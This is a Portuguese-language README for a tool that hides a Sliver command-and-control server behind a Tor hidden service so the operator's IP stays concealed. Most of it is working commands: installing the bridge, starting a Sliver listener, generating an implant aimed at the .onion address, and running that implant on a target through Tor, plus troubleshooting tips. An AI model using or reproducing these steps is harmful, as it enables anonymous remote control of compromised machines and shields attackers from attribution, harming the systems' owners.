
Ponte de transporte Tor para Sliver C2 - comando e controle anônimo
ponte de transporte baseada em tor para sliver c2. cria um serviço oculto e faz proxy do tráfego para o seu servidor sliver para que seu ip real nunca seja exposto.
configura um serviço oculto tor que aponta para um proxy http local. o proxy encaminha tudo para o listener https do sliver. os implants se conectam através do tor, você os controla através do sliver normalmente.
sliver server <---> proxy <---> tor hidden service <---> implant
:8443 :8080 xyz.onion (via tor)
git clone https://github.com/Otsmane-Ahmed/sliver-tor-bridge.git
cd sliver-tor-bridge
python3 -m venv venv
source venv/bin/activate
pip install -e .
inicie o sliver com um listener https:
sliver-client
sliver > https -L 127.0.0.1 -l 8443
em outro terminal, inicie a ponte:
sudo systemctl stop tor
sliver-tor-bridge start --sliver-port 8443
a saída mostrará algo como:
[+] Tor started successfully!
[+] Hidden Service: http://abc123xyz.onion
[+] Bridge is READY!
aguarde o endereço .onion, então gere um implant:
sliver > generate --http http://abc123xyz.onion --os linux --save /tmp/implant
execute o implant no alvo (precisa de tor):
HTTP_PROXY=socks5h://127.0.0.1:9050 ./implant
sliver-tor-bridge start [OPTIONS]
--sliver-port porta https do sliver (padrão 8443)
--tor-port porta socks do tor (padrão 9050)
--service-port porta do serviço oculto (padrão 80)
-c, --config caminho do arquivo de configuração
outros comandos:
sliver-tor-bridge status # verificar se o serviço oculto está ativo
sliver-tor-bridge stop # limpar diretório do serviço oculto
graph LR
Implant[Implant] -->|Tor Network| HS["Hidden Service (.onion)"]
HS -->|TCP :8080| Proxy["Bridge Proxy"]
Proxy -->|HTTPS :8443| Sliver["Sliver Server"]
a ponte fica no meio e retransmite o tráfego. o sliver pensa que está recebendo conexões https normais. o implant pensa que está falando com um servidor http normal.
docker-compose up -d
docker-compose logs -f
pip install pytest
pytest tests/
sliver_tor_bridge/
cli.py # interface de linha de comando
tor_manager.py # inicia o tor e cria o serviço oculto
proxy.py # aplicação flask que encaminha para o sliver
config.py # manipulação de configuração
tor não inicia: certifique-se de que o tor do sistema está parado (sudo systemctl stop tor)
tempo limite de conexão: a inicialização do tor pode levar de 1 a 3 minutos, aguarde 100%
implant não está conectando: certifique-se de que o implant tem acesso ao tor (proxy socks na porta 9050)
mit